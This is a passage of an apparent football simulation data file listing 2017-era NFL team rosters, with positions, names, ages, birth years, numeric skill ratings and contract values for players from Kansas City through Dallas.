Thomas,24,1994,76,57,61,63,92,76,0.500000,1 WR,Demetrius Harris,26,1992,70,60,70,63,87,70,1.100000,2 WR,Demarcus Robinson,23,1995,99,40,75,60,88,67,0.500000,3 WR,Ross Travis,24,1994,68,40,76,61,84,66,0.300000,2 OL,Mitch Morse,25,1993,86,76,73,85,81,60,1.000000,2 OL,Laurent Duvernay-Tard,26,1992,69,65,79,85,73,70,5.700000,6 OL,Eric Fisher,26,1992,87,71,83,77,74,73,9.100000,5 OL,Mitchell Schwartz,28,1990,87,73,76,75,85,60,5.000000,4 OL,Zach Fulton,26,1992,93,63,75,73,80,60,0.500000,1 OL,Cameron Erving,25,1993,90,57,75,71,73,60,2.300000,2 OL,Jordan Devey,29,1989,66,45,76,68,80,56,0.400000,1 OL,Bryan Witzmann,27,1991,82,59,73,65,77,60,0.300000,1 OL,Parker Ehinger,25,1993,76,50,70,65,79,60,0.600000,3 OL,James Winchester,28,1990,80,35,60,52,48,35,0.600000,5 K,Harrison Butker,22,1996,81,40,65,83,83,40,0.400000,4 K,Dustin Colquitt,35,1983,51,57,79,79,87,57,2.800000,1 S,Eric Berry,29,1989,69,87,81,88,91,76,10.600000,6 S,Ron Parker,30,1988,71,68,70,79,90,63,3.800000,3 S,Eric Murray,23,1995,84,45,79,75,89,66,0.600000,3 S,Daniel Sorensen,27,1991,81,62,81,75,84,66,3.100000,4 S,Steven Terrell,27,1991,72,50,73,77,92,43,0.400000,1 CB,Marcus Peters,24,1994,97,81,76,84,90,46,2.300000,2 CB,Steven Nelson,24,1994,91,60,83,79,90,55,0.500000,2 CB,Phillip Gaines,26,1992,73,50,71,79,93,37,0.500000,1 CB,Terrance Mitchell,25,1993,83,60,79,79,89,40,0.400000,1 CB,Kenneth Acker,25,1993,94,45,68,76,89,37,0.400000,1 CB,Garland East,24,2015,58,72,84,60,64,58,0.500000,1 LB,Justin Houston,28,1990,84,83,76,85,92,77,13.100000,4 LB,Derrick Johnson,35,1983,55,87,76,79,84,76,5.700000,2 LB,Ramik Wilson,25,1993,77,67,77,73,84,77,0.400000,1 LB,Kevin Pierre-Louis,26,1992,91,56,68,68,84,77,0.500000,1 LB,Reggie Ragland,24,1994,92,54,79,68,84,72,1.300000,3 LB,Ukeme Eligwe,23,1995,77,40,71,70,83,68,0.400000,4 LB,Tamba Hali,34,1984,74,75,79,67,88,70,5.400000,2 LB,Dee Ford,26,1992,96,60,75,61,82,76,2.800000,2 LB,Terrance Smith,24,1994,93,40,67,63,81,68,0.300000,1 LB,Tanoh Kpassagnon,23,1995,97,45,73,62,83,65,0.900000,4 LB,Frank Zombo,30,1988,65,60,76,63,76,67,0.900000,2 DL,Allen Bailey,28,1990,90,60,79,81,88,74,5.200000,2 DL,Jarvis Jenkins,29,1989,82,62,62,83,87,65,0.500000,1 DL,Chris Jones,23,1995,79,75,75,77,90,77,1.400000,3 DL,Bennie Logan,28,1990,65,63,71,79,92,70,5.600000,1 DL,Roy Miller,30,1988,77,60,73,76,89,68,0.900000,1 DL,Rakeem Nunez-Roches,24,1994,71,45,65,65,85,68,0.400000,1 DL,Isaiah Longhenry,27,2012,70,79,57,63,68,59,0.500000,1 DL,Fabian Vaszily,23,2016,93,81,71,60,55,56,0.500000,1 END_PLAYERS Oakland Raiders,OAK QB,Derek Carr,26,1992,92,71,83,91,82,55,14.600000,6 QB,EJ Manuel,27,1991,87,50,79,85,76,63,0.500000,1 QB,Connor Cook,24,1994,90,45,83,81,76,40,0.600000,3 RB,Marshawn Lynch,31,1987,59,71,79,91,89,84,2.800000,2 RB,Jalen Richard,24,1994,98,63,76,76,90,79,0.300000,2 RB,DeAndre Washington,24,1994,94,54,81,65,91,79,0.500000,3 RB,Jamize Olawale,28,1990,58,61,75,61,87,69,1.200000,2 WR,Cordarrelle Patterson,26,1992,81,60,79,71,92,82,2.700000,2 WR,Michael Crabtree,30,1988,71,91,83,77,87,76,5.500000,3 WR,Amari Cooper,23,1995,71,73,73,70,92,80,5.800000,2 WR,Seth Roberts,26,1992,67,67,75,70,91,69,0.200000,3 WR,Jared Cook,30,1988,59,70,71,71,86,68,3.300000,2 WR,Clive Walford,26,1992,96,60,75,70,79,65,0.600000,2 WR,Johnny Holton,26,1992,81,35,76,61,92,71,0.300000,2 WR,Lee Smith,30,1988,56,60,71,56,72,53,1.400000,1 OL,Donald Penn,34,1984,62,93,75,85,89,71,3.700000,1 OL,Kelechi Osemele,28,1990,72,91,73,87,88,64,7.400000,4 OL,Rodney Hudson,28,1990,76,85,81,77,89,76,5.600000,3 OL,Gabe Jackson,26,1992,95,75,75,85,72,60,5.900000,6 OL,David Sharpe,22,1996,92,45,75,76,80,61,0.600000,4 OL,Marshall Newhouse,29,1989,86,60,73,75,81,61,1.100000,2 OL,Vadal Alexander,23,1995,68,45,76,75,74,63,0.400000,3 OL,Jylan Ware,24,1994,81,40,76,73,77,60,0.400000,4 OL,Jon Feliciano,25,1993,99,45,76,67,79,62,0.500000,2 OL,Jon Condo,36,1982,62,68,71,58,51,45,0.700000,1 K,Marquette King,29,1989,63,57,71,97,92,57,2.100000,4 K,Sebastian Janikowski,39,1979,51,45,68,95,87,45,3.600000,1 K,Giorgio Tavecchio,27,1991,81,40,67,83,84,40,0.400000,1 S,Obi Melifonwu,23,1995,92,45,79,79,92,71,0.900000,4 S,Karl Joseph,24,1994,94,71,73,79,87,74,2.900000,3 S,Reggie Nelson,34,1984,61,67,87,77,87,69,2.700000,1 S,Keith McGill,28,1990,68,40,65,74,89,67,0.500000,1 S,Shalom Luani,23,1995,87,40,77,71,87,55,0.400000,4 S,Erik Harris,27,1991,70,40,76,69,85,60,0.300000,1 CB,Travis Carrie,27,1991,63,62,71,82,91,59,0.500000,1 CB,David Amerson,26,1992,64,71,75,80,90,60,4.200000,4 CB,Sean Smith,30,1988,64,63,77,82,87,55,7.100000,3 CB,Gareon Conley,22,1996,89,60,77,79,91,47,2.500000,4 CB,Dexter McDonald,26,1992,63,40,70,74,91,37,0.400000,2 CB,Hunter Diskind,32,2007,67,80,102,63,65,56,0.500000,1 LB,Navorro Bowman,29,1989,81,73,73,79,88,75,1.700000,1 LB,Bruce Irvin,30,1988,88,62,83,71,80,76,6.600000,3 LB,Marquel Lee,22,1996,82,60,81,70,83,69,0.500000,4 LB,Cory James,24,1994,98,59,77,68,79,74,0.400000,3 LB,Jihad Ward,23,1995,77,45,79,68,84,65,1.200000,3 LB,Shilique Calhoun,25,1993,81,45,79,64,82,69,0.600000,3 LB,Nicholas Morrow,22,1996,81,56,71,62,80,76,0.300000,3 LB,Xavier Woodson-Luste,22,1996,75,45,73,62,77,69,0.300000,3 DL,Khalil Mack,26,1992,75,89,91,76,93,88,5.900000,2 DL,Eddie Vanderdoes,23,1995,76,52,73,79,86,74,0.600000,4 DL,Mario Edwards Jr.,23,1995,77,63,63,77,88,72,1.400000,2 DL,Justin Ellis,27,1991,62,61,70,71,89,71,0.700000,1 DL,Treyvon Hester,25,1993,92,52,73,73,83,66,0.400000,4 DL,Darius Latham,23,1995,92,40,71,68,84,68,0.300000,2 DL,James Cowser,27,1991,62,40,71,67,82,74,0.300000,1 DL,Denico Autry,27,1991,63,60,70,60,81,71,1.100000,1 END_PLAYERS Los Angeles Chargers,LAC QB,Cardale Jones,25,1993,97,45,81,93,68,65,0.500000,3 QB,Philip Rivers,36,1982,47,81,95,79,84,37,15.800000,3 QB,Kellen Clemens,34,1984,70,59,71,71,76,37,0.700000,1 RB,Melvin Gordon,24,1994,79,76,77,77,92,82,2.600000,2 RB,Branden Oliver,26,1992,76,59,75,75,88,77,0.500000,1 RB,Andre Williams,25,1993,79,59,71,73,87,72,0.400000,1 RB,Austin Ekeler,22,1996,67,40,73,61,92,76,0.300000,3 RB,Derek Watt,25,1993,62,40,81,60,81,63,0.400000,3 WR,Keenan Allen,25,1993,91,87,65,85,87,77,6.800000,4 WR,Travis Benjamin,28,1990,76,73,65,75,92,74,4.500000,3 WR,Mike Williams,23,1995,75,60,77,76,89,76,5.000000,4 WR,Tyrell Williams,25,1993,67,73,71,75,91,75,0.300000,1 WR,Antonio Gates,37,1981,64,91,68,79,77,70,3.800000,1 WR,Geremy Davis,25,1993,82,35,67,71,89,72,0.400000,1 WR,Hunter Henry,23,1995,77,62,83,75,84,66,1.400000,3 WR,Sean Culkin,24,1994,98,40,79,60,82,62,0.300000,3 WR,Sean McGrath,30,1988,54,60,75,60,77,55,0.400000,1 WR,Jeff Cumberland,30,1988,51,68,70,60,86,47,0.500000,1 OL,Dan Feeney,23,1995,89,45,71,83,77,60,0.700000,4 OL,Russell Okung,29,1989,75,67,71,77,73,76,9.800000,4 OL,Matt Slauson,31,1987,52,83,76,79,74,60,1.400000,1 OL,Joe Barksdale,29,1989,71,62,73,77,72,60,4.100000,3 OL,Michael Ola,29,1989,70,45,71,71,77,62,0.400000,1 OL,Kenny Wiggins,29,1989,75,60,75,71,72,60,0.600000,1 OL,Spencer Pulley,24,1994,74,60,75,70,78,60,0.300000,2 OL,Michael Schofield,27,1991,72,61,71,70,74,59,0.700000,1 OL,Sam Tevi,23,1995,80,40,76,64,78,60,0.400000,4 OL,Mike Windt,31,1987,74,59,70,60,55,45,0.800000,4 K,Nick Novak,36,1982,45,45,64,81,88,45,0.600000,1 K,Drew Kaser,24,1994,98,40,60,91,75,40,0.400000,3 S,Tre Boston,25,1993,77,62,76,79,87,71,0.600000,1 S,Jahleel Addae,27,1991,66,70,79,79,83,70,3.800000,4 S,Rayshawn Jenkins,23,1995,88,45,71,74,89,70,0.600000,4 S,Adrian Phillips,25,1993,74,54,76,75,87,63,0.400000,1 CB,Jason Verrett,26,1992,81,70,77,86,93,43,2.700000,2 CB,Desmond King,23,1995,92,59,85,77,86,53,0.500000,4 CB,Casey Hayward,28,1990,82,79,70,80,89,43,3.700000,2 CB,Trevor Williams,24,1994,77,63,73,79,91,44,0.300000,1 CB,Michael Davis,22,1996,80,40,79,70,92,53,0.300000,1 CB,Wilson Spicknall,31,2008,64,77,95,61,58,66,0.500000,1 LB,Jatavis Brown,23,1995,78,61,77,75,88,77,0.400000,3 LB,Denzel Perryman,24,1994,95,64,81,71,88,74,1.000000,2 LB,Nick Dzubnar,26,1992,76,50,79,73,82,65,0.300000,1 LB,Korey Toomer,29,1989,89,65,61,63,79,80,1.100000,1 LB,James Onwualu,23,1995,98,40,76,63,80,70,0.300000,3 LB,Hayes Pullard,25,1993,67,52,76,62,76,71,0.400000,2 LB,Kyle Emanuel,26,1992,72,57,75,59,80,69,0.400000,2 DL,Corey Liuget,27,1991,72,70,79,83,93,76,7.300000,4 DL,Brandon Mebane,32,1986,50,76,75,83,92,70,3.400000,2 DL,Tenny Palepoi,27,1991,75,54,68,79,89,71,0.400000,1 DL,Joey Bosa,22,1996,85,68,76,76,84,77,6.700000,3 DL,Melvin Ingram,28,1990,88,73,76,70,85,79,11.600000,4 DL,Darius Philon,23,1995,90,54,71,64,82,75,0.400000,2 DL,Damion Square,28,1990,82,57,68,65,82,71,1.600000,2 DL,Jeremiah Attaochu,24,1994,78,60,71,60,79,79,0.900000,1 DL,Chris McCain,26,1992,68,54,75,45,69,75,0.400000,1 END_PLAYERS Chicago Bears,CHI QB,Mitchell Trubisky,23,1995,91,54,87,87,79,67,7.500000,4 QB,Mike Glennon,28,1990,70,62,81,87,77,37,10.000000,3 QB,Mark Sanchez,31,1987,80,57,77,76,74,40,1.700000,1 RB,Jordan Howard,23,1995,76,76,73,81,90,82,0.400000,3 RB,Tarik Cohen,22,1996,90,62,73,67,92,80,0.600000,4 RB,Benny Cunningham,27,1991,81,60,76,67,87,71,0.600000,1 RB,Taquan Mizzell,24,1994,67,40,73,59,87,72,0.300000,3 RB,Mike Burton,25,1993,87,62,71,45,81,47,0.400000,2 WR,Cameron Meredith,25,1993,85,75,76,79,89,75,0.300000,1 WR,Tre McBride,25,1993,86,35,75,75,91,76,0.300000,1 WR,Dontrelle Inman,28,1990,76,63,75,77,88,75,1.700000,1 WR,Kendall Wright,28,1990,75,63,83,75,90,79,1.400000,1 WR,Zach Miller,33,1985,52,64,65,79,85,69,2.000000,1 WR,Markus Wheaton,26,1992,68,60,79,70,90,72,3.900000,2 WR,Adam Shaheen,24,1994,68,45,75,68,81,70,1.300000,4 WR,Josh Bellamy,28,1990,64,62,76,64,89,67,0.500000,1 WR,Dion Sims,26,1992,89,62,65,68,80,63,4.000000,3 WR,Daniel Brown,25,1993,78,40,75,63,86,66,0.400000,1 OL,Josh Sitton,31,1987,83,85,71,83,77,70,4.800000,2 OL,Tom Compton,28,1990,74,58,81,81,74,60,1.700000,1 OL,Kyle Long,29,1989,79,73,83,71,85,65,6.300000,5 OL,Cody Whitehair,25,1993,71,77,79,76,77,57,0.900000,3 OL,Charles Leno Jr.,26,1992,69,67,73,67,85,60,0.400000,5 OL,Bradley Sowell,28,1990,64,59,70,70,78,60,0.500000,1 OL,Bobby Massie,28,1990,72,63,77,70,73,60,4.100000,2 OL,Hroniss Grasu,26,1992,93,60,75,63,74,60,0.600000,2 OL,Andrew Depaola,30,1988,89,45,70,61,73,58,0.400000,1 OL,Jame Rease,31,2008,87,68,73,58,61,64,0.500000,1 K,Pat O'Donnell,26,1992,96,50,67,83,85,50,0.400000,1 K,Connor Barth,31,1987,63,45,63,77,84,45,0.700000,1 S,Quintin Demps,32,1986,66,62,76,76,88,68,3.000000,3 S,DeAndre Houston-Carso,24,1994,89,40,79,71,88,74,0.400000,3 S,Eddie Jackson,25,1993,88,58,63,76,88,60,0.600000,4 S,Adrian Amos,24,1994,81,62,73,79,93,46,0.400000,2 S,Deon Bush,24,1994,75,45,76,74,87,60,0.500000,3 CB,Prince Amukamara,28,1990,89,67,76,82,90,69,6.600000,1 CB,Kyle Fuller,25,1993,71,61,81,80,92,60,2.400000,1 CB,Bryce Callahan,26,1992,88,65,75,84,94,40,0.400000,1 CB,Marcus Cooper,27,1991,87,61,76,79,90,46,3.600000,3 CB,Cre'von LeBlanc,23,1995,70,54,73,75,87,57,0.300000,2 CB,Sherrick McManis,30,1988,71,45,65,75,87,44,0.900000,1 CB,Deiondre' Hall,23,1995,73,40,75,74,88,40,0.500000,3 LB,Jerrell Freeman,31,1987,73,79,77,89,86,75,2.800000,2 LB,Danny Trevathan,27,1991,75,75,76,85,83,75,4.600000,3 LB,Nick Kwiatkoski,24,1994,87,60,76,73,85,75,0.500000,3 LB,Pernell McPhee,29,1989,83,70,76,70,91,69,5.200000,3 LB,Leonard Floyd,25,1993,77,60,75,70,82,79,4.000000,3 LB,Sam Acho,29,1989,80,60,75,70,80,68,0.600000,1 LB,Christian Jones,26,1992,66,60,79,65,79,74,1.300000,1 LB,Roy Robertson-Har,24,1994,95,45,73,65,83,65,0.300000,2 LB,Willie Young,32,1986,50,67,73,61,80,70,2.900000,2 DL,John Jenkins,28,1990,77,50,68,85,89,68,0.600000,1 DL,Akiem Hicks,28,1990,67,76,75,76,90,74,3.400000,1 DL,Eddie Goldman,23,1995,96,63,71,77,90,67,1.300000,2 DL,Mitch Unrein,30,1988,70,71,71,71,85,70,0.800000,1 DL,Jonathan Bullard,24,1994,74,40,76,65,84,77,0.700000,3 DL,Carlton Alvernaz,22,2017,68,67,63,66,63,65,0.500000,1 DL,Ira Maenpaa,29,2010,69,64,94,63,68,65,0.500000,1 DL,Carl Wisnewski,24,2015,50,70,63,63,63,66,0.500000,1 END_PLAYERS Detroit Lions,DET QB,Matthew Stafford,29,1989,87,75,89,97,82,46,16.800000,1 QB,Jake Rudock,24,1994,70,40,77,77,73,40,0.300000,1 RB,Ameer Abdullah,24,1994,90,64,73,73,89,79,0.800000,2 RB,Zach Zenner,26,1992,85,61,71,71,87,71,0.300000,1 RB,Theo Riddick,26,1992,83,73,77,64,87,79,2.400000,3 RB,Tion Green,24,1994,99,40,70,67,81,74,0.300000,3 RB,Dwayne Washington,23,1995,90,45,65,62,90,70,0.400000,3 RB,Darren Fells,31,1987,66,61,71,58,73,63,0.700000,1 WR,Golden Tate,29,1989,78,79,83,77,89,84,5.300000,2 WR,Kenny Golladay,24,1994,70,50,77,75,90,74,0.600000,4 WR,Marvin Jones,27,1991,67,76,79,70,90,72,5.000000,4 WR,Eric Ebron,24,1994,67,68,77,70,87,75,3.000000,1 WR,TJ Jones,25,1993,87,50,79,68,90,71,0.400000,1 WR,Jace Billingsley,24,1994,99,40,76,62,90,75,0.300000,2 WR,Jared Abbrederis,27,1991,90,54,77,64,89,62,0.400000,1 WR,Michael Roberts,23,1995,97,45,77,67,77,60,0.600000,4 OL,Taylor Decker,23,1995,84,75,81,81,84,71,2.700000,3 OL,TJ Lang,30,1988,64,85,77,79,87,75,7.600000,3 OL,Ricky Wagner,28,1990,82,76,73,76,84,65,7.800000,5 OL,Corey Robinson,25,1993,68,45,65,79,79,62,0.400000,2 OL,Travis Swanson,26,1992,68,75,81,76,73,60,0.700000,1 OL,Graham Glasgow,25,1993,68,60,79,71,74,60,0.600000,3 OL,Brian Mihalik,25,1993,79,40,70,68,74,58,0.300000,2 OL,Emmett Cleary,27,1991,78,40,76,67,78,60,0.400000,1 OL,Don Barclay,28,1990,83,60,76,68,73,56,0.700000,1 OL,Don Muhlbach,36,1982,52,68,71,62,62,40,0.700000,1 K,Matt Prater,33,1985,63,56,60,91,95,56,2.000000,1 K,Sam Martin,27,1991,80,50,71,93,86,50,2.100000,4 S,Miles Killebrew,24,1994,84,61,77,79,87,79,0.500000,3 S,Tavon Wilson,27,1991,85,70,85,79,87,69,1.200000,1 S,Glover Quin,31,1987,81,81,79,80,86,69,4.800000,3 S,Charles Washington,24,1994,82,40,71,76,90,57,0.300000,2 S,Don Carey,30,1988,78,45,75,74,86,55,0.500000,1 CB,Darius Slay,26,1992,73,75,75,86,94,53,9.300000,4 CB,Nevin Lawson,26,1992,84,63,79,77,90,62,0.600000,1 CB,DJ Hayden,27,1991,77,58,68,77,91,62,3.000000,1 CB,Jamal Agnew,22,1996,71,40,73,74,93,59,0.500000,4 CB,Quandre Diggs,24,1994,94,65,79,77,87,43,0.400000,2 CB,Teez Tabor,22,1996,89,45,77,72,87,53,1.000000,4 LB,Tahir Whitehead,27,1991,72,76,77,83,84,79,2.600000,1 LB,Jarrad Davis,22,1996,79,61,68,79,89,77,2.700000,4 LB,Nick Bellore,28,1990,62,61,70,76,85,65,0.500000,1 LB,Steve Longa,23,1995,92,35,79,73,85,65,0.300000,2 LB,Paul Worrilow,27,1991,82,59,79,67,81,70,2.300000,1 LB,Jalen Reeves-Maybin,22,1996,90,45,71,62,76,71,0.600000,4 DL,Haloti Ngata,33,1985,67,71,83,89,92,70,5.000000,1 DL,Akeem Spence,26,1992,64,52,75,83,84,68,2.300000,3 DL,Cornelius Washington,28,1990,86,54,61,77,84,74,2.300000,2 DL,A'Shawn Robinson,22,1996,76,58,79,75,89,71,1.100000,3 DL,Ziggy Ansah,28,1990,77,64,77,71,86,77,5.800000,1 DL,Anthony Zettel,25,1993,66,64,81,70,86,79,0.400000,3 DL,Khyri Thornton,28,1990,64,40,68,75,83,68,1.100000,2 DL,Jeremiah Ledbetter,23,1995,98,45,73,70,84,72,0.400000,4 DL,Jacquies Smith,27,1991,78,60,63,59,73,71,1.100000,1 DL,Jeremiah Valoaga,23,1995,72,45,73,54,73,71,0.300000,3 END_PLAYERS Green Bay Packers,GB QB,Aaron Rodgers,34,1984,72,95,93,95,92,55,18.100000,3 QB,Brett Hundley,24,1994,98,40,77,83,74,67,0.400000,2 QB,Joe Callahan,24,1994,97,40,79,73,75,43,0.300000,1 RB,Aaron Jones,23,1995,93,45,68,70,89,79,0.400000,4 RB,Jamaal Williams,22,1996,76,45,75,73,88,76,0.600000,4 RB,Ty Montgomery,24,1994,88,67,70,68,90,77,0.600000,2 RB,Devante Mays,23,1995,78,40,75,68,88,72,0.400000,4 RB,Aaron Ripkowski,25,1993,76,71,68,52,82,45,0.400000,2 WR,Randall Cobb,27,1991,72,76,79,93,91,74,8.300000,2 WR,Jordy Nelson,32,1986,53,97,79,95,89,69,7.900000,2 WR,Davante Adams,25,1993,73,85,76,81,89,74,0.800000,1 WR,Geronimo Allison,23,1995,70,58,71,68,87,69,0.300000,1 WR,Richard Rodgers,25,1993,79,61,68,70,78,67,0.700000,1 WR,Jeff Janis,26,1992,66,50,75,64,92,66,0.400000,1 WR,Trevor Davis,24,1994,76,54,73,63,92,63,0.400000,3 WR,Lance Kendricks,29,1989,70,64,79,63,82,66,1.600000,2 OL,David Bakhtiari,26,1992,71,97,70,81,82,89,7.900000,4 OL,Corey Linsley,26,1992,85,77,73,83,79,60,0.600000,1 OL,Bryan Bulaga,28,1990,80,89,75,77,74,76,5.200000,3 OL,Justin McCray,25,1993,86,50,65,79,77,59,0.300000,1 OL,Jahri Evans,34,1984,66,71,76,76,80,62,1.500000,1 OL,Lane Taylor,28,1990,76,70,73,76,79,60,1.600000,1 OL,Jason Spriggs,23,1995,83,50,85,70,77,61,1.100000,3 OL,Lucas Patrick,24,1994,89,45,71,67,78,59,0.300000,1 OL,Ulrick John,25,1993,94,58,71,62,75,58,0.400000,1 OL,Derek Hart,25,1993,85,40,75,54,45,52,0.300000,1 K,Mason Crosby,33,1985,76,40,76,89,84,40,3.300000,3 K,Justin Vogel,24,1994,73,40,63,87,81,40,0.300000,3 S,Josh Jones,23,1995,95,58,77,79,92,74,0.800000,4 S,Morgan Burnett,28,1990,86,71,75,79,86,75,5.200000,1 S,Ha Ha Clinton-Dix,25,1993,77,71,81,77,87,77,2.400000,2 S,Marwin Evans,24,1994,86,40,76,75,90,55,0.300000,2 S,Jermaine Whitehead,24,1994,67,40,75,71,89,40,0.300000,1 CB,Quinten Rollins,25,1993,93,58,81,77,87,63,0.700000,2 CB,Kevin King,22,1996,72,56,75,77,91,55,1.600000,4 CB,Damarious Randall,25,1993,67,59,76,77,90,46,1.900000,2 CB,Josh Hawkins,24,1994,87,40,71,77,93,37,0.300000,2 CB,Davon House,28,1990,70,60,75,76,89,40,2.300000,1 CB,Demetri Goodson,28,1990,61,40,63,76,91,37,0.400000,1 CB,Lenzy Pipkins,24,1994,74,40,63,71,90,45,0.300000,3 CB,Donatello Brown,26,1992,85,35,77,71,89,37,0.300000,1 LB,Jake Ryan,25,1993,81,63,71,73,84,72,0.500000,2 LB,Blake Martinez,23,1995,68,70,85,73,86,72,0.500000,3 LB,Clay Matthews,31,1987,72,73,83,70,87,76,10.800000,2 LB,Nick Perry,27,1991,71,70,77,68,85,77,9.700000,5 LB,Kyler Fackrell,26,1992,68,45,71,70,82,70,0.600000,3 LB,Joe Thomas,26,1992,78,62,76,65,80,74,0.400000,1 LB,Vince Biegel,24,1994,86,45,70,64,81,69,0.600000,4 LB,Chris Odom,23,1995,87,35,73,62,80,60,0.300000,3 LB,Ahmad Brooks,33,1985,41,61,77,56,79,68,3.300000,1 DL,Mike Daniels,28,1990,87,85,76,89,95,77,8.300000,3 DL,Dean Lowry,23,1995,77,45,79,75,89,75,0.500000,3 DL,Kenny Clark,22,1996,70,63,79,76,88,69,2.200000,3 DL,Montravius Adams,23,1995,85,45,85,75,84,74,0.400000,4 DL,Quinton Dial,27,1991,61,62,63,76,87,68,2.800000,3 DL,Reggie Vellekamp,33,2006,60,89,67,66,66,63,0.500000,1 DL,Rory Blevans,25,2014,95,78,55,57,65,59,0.500000,1 DL,Davis Szafran,26,2013,57,68,62,55,64,66,0.500000,1 END_PLAYERS Minnesota Vikings,MIN QB,Teddy Bridgewater,25,1993,72,62,76,81,85,62,1.600000,1 QB,Sam Bradford,30,1988,64,75,73,81,84,37,11.300000,1 QB,Kyle Sloter,23,1995,72,45,81,79,76,62,0.300000,1 QB,Case Keenum,29,1989,85,67,75,76,79,37,1.400000,1 RB,Dalvin Cook,22,1996,81,62,75,77,90,82,1.400000,4 RB,Jerick McKinnon,25,1993,68,62,76,76,93,80,0.500000,1 RB,Latavius Murray,27,1991,64,71,68,75,92,80,3.500000,3 RB,Mack Brown,26,1992,61,40,77,65,87,74,0.300000,1 RB,CJ Ham,24,1994,68,50,73,63,83,75,0.300000,2 RB,Blake Bell,26,1992,63,40,64,64,79,70,0.500000,2 WR,Stefon Diggs,24,1994,84,81,65,83,91,72,0.400000,2 WR,Adam Thielen,27,1991,77,79,75,83,89,70,3.600000,4 WR,Kyle Rudolph,28,1990,77,81,79,85,77,67,5.400000,3 WR,Michael Floyd,28,1990,90,52,75,71,89,74,0.900000,1 WR,Stacy Coley,23,1995,87,40,67,70,91,67,0.400000,4 WR,Laquon Treadwell,22,1996,67,60,77,71,87,70,2.400000,3 WR,Jarius Wright,28,1990,78,60,85,65,91,70,2.800000,3 WR,David Morgan,24,1994,99,50,65,64,72,62,0.400000,3 OL,Joe Berger,35,1983,45,71,75,79,78,62,1.400000,1 OL,Pat Elflein,23,1995,98,60,83,77,74,59,0.700000,4 OL,Riley Reiff,29,1989,90,64,89,73,80,63,8.700000,5 OL,Danny Isidora,23,1995,99,45,71,73,78,60,0.400000,4 OL,Aviante Collins,24,1994,86,35,71,75,74,59,0.300000,3 OL,Mike Remmers,28,1990,84,64,71,73,74,63,4.100000,5 OL,Nick Easton,25,1993,78,56,76,68,72,60,0.300000,1 OL,Jeremiah Sirles,26,1992,79,50,81,63,78,60,0.400000,1 OL,Rashod Hill,25,1993,74,40,75,63,74,60,0.300000,2 OL,Kevin McDermott,27,1991,71,45,73,45,54,45,0.600000,4 K,Ryan Quigley,27,1991,81,40,73,87,81,40,0.500000,2 K,Kai Forbath,30,1988,51,45,70,73,87,45,0.300000,1 S,Harrison Smith,28,1990,81,85,79,80,87,76,6.900000,4 S,Andrew Sendejo,30,1988,63,62,71,72,83,72,2.500000,3 S,Jayron Kearse,23,1995,91,40,79,69,85,63,0.400000,3 S,Anthony Harris,26,1992,75,57,70,76,87,43,0.300000,1 CB,Xavier Rhodes,27,1991,83,77,77,88,91,43,9.600000,6 CB,Terence Newman,39,1979,73,76,75,79,87,53,2.300000,1 CB,Trae Waynes,25,1993,76,61,77,77,94,40,3.200000,2 CB,Tramaine Brock,29,1989,83,63,76,77,88,44,0.600000,1 CB,Mackensie Alexander,24,1994,77,57,73,79,90,37,0.900000,3 CB,Marcus Sherels,30,1988,68,52,67,77,90,37,1.300000,1 LB,Kentrell Brothers,24,1994,88,40,81,77,85,65,0.400000,3 LB,Anthony Barr,25,1993,75,70,71,73,84,77,4.300000,2 LB,Eric Kendricks,25,1993,67,71,70,70,82,79,1.100000,2 LB,Eric Wilson,23,1995,78,35,76,67,81,71,0.300000,3 LB,Ben Gedeon,23,1995,90,52,87,63,81,70,0.600000,4 LB,Emmanuel Lamur,28,1990,82,52,70,60,75,70,1.700000,1 DL,Linval Joseph,29,1989,90,76,71,95,97,72,7.400000,6 DL,Everson Griffen,30,1988,74,75,67,73,88,77,8.200000,6 DL,Shamar Stephen,26,1992,75,60,76,73,85,67,0.600000,1 DL,Jaleel Johnson,23,1995,94,45,79,68,84,72,0.600000,4 DL,Danielle Hunter,23,1995,86,62,71,64,81,79,0.600000,2 DL,Stephen Weatherly,23,1995,68,35,75,63,80,75,0.300000,2 DL,Brian Robison,34,1984,44,70,81,64,80,71,2.300000,2 DL,Tashawn Bower,22,1996,73,35,71,62,79,72,0.400000,3 DL,Tom Johnson,33,1985,46,63,65,65,81,63,1.500000,1 END_PLAYERS Dallas Cowboys,DAL QB,Dak Prescott,24,1994,87,75,87,87,81,72,0.500000,3 QB,Cooper Rush,24,1994,80,45,83,77,75,40,0.300000,3 RB,Ezekiel Elliott,22,1996,92,77,85,77,91,84,6.500000,3 RB,Alfred Morris,29,1989,51,65,87,77,87,75,1.400000,1 RB,Rod Smith,25,1993,84,50,76,65,86,72,0.400000,2 RB,Darren McFadden,30,1988,75,59,62,65,89,70,0.700000,1 RB,Keith Smith,25,1993,83,61,70,52,77,62,0.400000,1 WR,Dez Bryant,29,1989,64,81,79,85,89,82,11.300000,3 WR,Cole Beasley,28,1990,79,75,83,76,88,72,2.800000,2 WR,Jason Witten,35,1983,59,95,89,87,77,63,4.800000,5 WR,Ryan Switzer,23,1995,76,45,81,70,89,71,0.600000,4 WR,Terrance Williams,28,1990,72,65,77,71,90,71,3.400000,4 WR,Noah Brown,20,1998,88,40,71,73,87,63,0.400000,4 WR,Brice Butler,27,1991,88,64,68,67,92,66,0.900000,1 WR,James Hanna,28,1990,82,63,64,60,87,66,2.200000,2 WR,Blake Jarwin,23,1995,70,35,73,63,81,59,0.400000,3 WR,Geoff Swaim,24,1994,82,52,64,60,82,60,0.400000,2 OL,Zack Martin,27,1991,72,93,89,87,91,87,2.200000,1 OL,Travis Frederick,26,1992,77,91,93,85,88,67,6.200000,7 OL,Tyron Smith,27,1991,69,95,76,79,78,73,9.700000,7 OL,Byron Bell,28,1990,69,60,71,83,74,60,1.400000,1 OL,Jonathan Cooper,27,1991,88,56,64,77,77,60,1.600000,1 OL,La'el Collins,24,1994,77,60,77,77,77,60,4.100000,3 OL,Joe Looney,27,1991,78,50,75,68,78,59,0.600000,1 OL,Chaz Green,25,1993,85,60,67,61,73,61,0.600000,2 OL,Joesph Sneath,25,2014,94,68,56,61,62,63,0.500000,1 OL,L. P. Ladouceur,36,1982,54,73,73,59,55,59,0.800000,1 K,Dan Bailey,29,1989,62,58,71,85,95,58,2.500000,4 K,Chris Jones,28,1990,65,56,67,87,92,56,1.000000,1 K,Mike Nugent,35,1983,74,40,71,83,77,40,0.600000,1 S,Byron Jones,25,1993,68,62,79,86,91,59,2.100000,2 S,Kavon Frazier,23,1995,95,45,83,75,86,75,0.400000,3 S,Xavier Woods,22,1996,95,54,79,75,89,69,0.400000,4 S,Jeff Heath,26,1992,87,59,76,76,89,60,1.500000,3 CB,Chidobe 